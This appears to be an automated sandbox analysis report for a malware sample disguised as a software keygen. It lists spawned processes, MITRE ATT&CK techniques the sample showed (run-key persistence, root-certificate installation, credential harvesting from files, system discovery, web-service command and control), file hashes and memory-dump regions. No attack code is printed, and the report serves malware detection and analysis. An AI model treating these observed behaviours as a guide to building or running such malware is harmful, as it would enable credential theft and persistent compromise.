                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:3924
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:4668

                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                        T1518

                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                        6
                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                        T1018

                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          ccdda17e0525f5010773897b786748f3

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          ba15e980ba09cd2d6ac1bb08597aafb58dcf3e16

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3960d54ab3839505b2bcabc5cbdccb636dae1220c819dd967eca13067740ffd0

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          c07f6a986a48db509ff8013b50bfbcc4a03b91b9bd092f7ff97128f1fc7f0082d7c8d384e752e469ac139088860586bab212ac0427bf1b1a1eec52b74ce24bff

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                                                                        • \??\pipe\crashpad_4112_MGCAYMOROHDRCBZW
                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                        • \??\pipe\crashpad_852_TWOMPUXJXMWIPGED
                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                        • memory/184-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/340-259-0x0000022506460000-0x00000225064D2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/912-251-0x0000019E597B0000-0x0000019E597FB000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          300KB

                                                                                                                                                                                                                                        • memory/912-252-0x0000019E59970000-0x0000019E599E2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/1028-267-0x000001AC37540000-0x000001AC375B2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/1088-265-0x00000209B2EA0000-0x00000209B2F12000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/1156-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/1184-273-0x0000017215F60000-0x0000017215FD2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/1264-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/1264-292-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                                        • memory/1304-285-0x000001E7DFBD0000-0x000001E7DFC42000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/1304-289-0x000001E7E2100000-0x000001E7E2205000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                        • memory/1304-284-0x000001E7DF890000-0x000001E7DF8DB000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          300KB

                                                                                                                                                                                                                                        • memory/1332-275-0x000001B9AF370000-0x000001B9AF3E2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/1376-269-0x00000221099D0000-0x0000022109A42000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/1632-306-0x0000000000400000-0x000000000040A000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                        • memory/1952-271-0x000002C721B40000-0x000002C721BB2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/2084-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/2144-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/2220-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/2236-288-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          172KB

                                                                                                                                                                                                                                        • memory/2236-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/2280-309-0x0000000002A70000-0x0000000002A72000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                        • memory/2280-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/2308-258-0x000001F796BD0000-0x000001F796C42000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/2368-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/2432-261-0x0000019A1AA60000-0x0000019A1AAD2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/2440-263-0x000001D4A3FB0000-0x000001D4A4022000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/2680-277-0x000002C271C50000-0x000002C271CC2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/2696-248-0x000001F4C8F80000-0x000001F4C8FF2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/2840-255-0x000001C578550000-0x000001C5785C2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          456KB

                                                                                                                                                                                                                                        • memory/2920-308-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/2976-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3044-310-0x0000000006EF0000-0x0000000006F05000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          84KB

                                                                                                                                                                                                                                        • memory/3076-280-0x0000000000ED0000-0x000000000100F000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                        • memory/3076-282-0x0000000010000000-0x0000000010145000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                        • memory/3188-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3188-125-0x00007FFAAC2A0000-0x00007FFAAC2A1000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3572-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3620-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3748-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3756-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3824-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3824-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3856-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3860-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/3980-279-0x00000000056A0000-0x00000000056A1000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/4112-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4116-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4132-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4204-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4224-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4228-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4244-294-0x0000000003030000-0x0000000003032000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                        • memory/4256-287-0x0000000000400000-0x000000000087F000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.5MB

                                                                                                                                                                                                                                        • memory/4256-286-0x0000000002500000-0x0000000002591000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          580KB

                                                                                                                                                                                                                                        • memory/4300-253-0x000000001B3C0000-0x000000001B3C2000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                        • memory/4308-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4344-291-0x0000000002B90000-0x0000000002B92000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                        • memory/4368-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4380-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4424-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4432-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4432-250-0x0000000000FE0000-0x000000000117C000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                        • memory/4448-290-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/4460-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4496-307-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          172KB

                                                                                                                                                                                                                                        • memory/4524-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4588-298-0x0000000000575000-0x0000000000577000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                        • memory/4588-295-0x0000000000570000-0x0000000000572000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                        • memory/4588-296-0x0000000000572000-0x0000000000574000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                        • memory/4588-297-0x0000000000574000-0x0000000000575000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/4620-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4644-283-0x0000000005210000-0x0000000005211000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/4648-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4660-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4672-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4680-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4704-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4720-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4724-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4768-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4772-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4772-293-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/4772-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4792-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4804-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4820-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4828-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4856-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4864-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4884-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4900-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4924-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4936-281-0x0000000004C60000-0x0000000004C61000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/4936-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4936-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4968-299-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          288KB

                                                                                                                                                                                                                                        • memory/4968-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/4996-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5008-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5012-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5024-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5028-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5032-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5044-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5080-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5088-249-0x0000000004800000-0x000000000485D000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          372KB

                                                                                                                                                                                                                                        • memory/5088-247-0x0000000004870000-0x0000000004970000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1024KB

                                                                                                                                                                                                                                        • memory/5088-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                        • memory/5148-302-0x00000000046B0000-0x00000000046F4000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          272KB

                                                                                                                                                                                                                                        • memory/5364-300-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.5MB

                                                                                                                                                                                                                                        • memory/5436-301-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          7.0MB

                                                                                                                                                                                                                                        • memory/5436-304-0x000001E7B3770000-0x000001E7B3790000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                        • memory/5652-303-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          284KB

                                                                                                                                                                                                                                        • memory/6008-305-0x0000000005390000-0x000000000588E000-memory.dmp
                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5.0MB